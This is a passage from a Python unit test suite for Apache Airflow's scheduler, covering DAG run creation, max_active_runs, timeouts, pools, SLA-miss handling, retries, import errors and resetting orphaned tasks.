len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
@parameterized.expand([
[State.NONE, None, None],
[State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
[State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
with create_session() as session:
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = state
ti.start_date = start_date
ti.end_date = end_date
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs
has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has
been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEqual(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='[email protected]',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# removing self.assertEqual(ti.state, State.SCHEDULED)
# as scheduler will move state from SCHEDULED to QUEUED
# now the executor has cleared and it should be allowed the re-queue,
# but tasks stay in the executor.queued_tasks after executor.heartbeat()
# will be set back to SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.RUNNING)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEqual(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
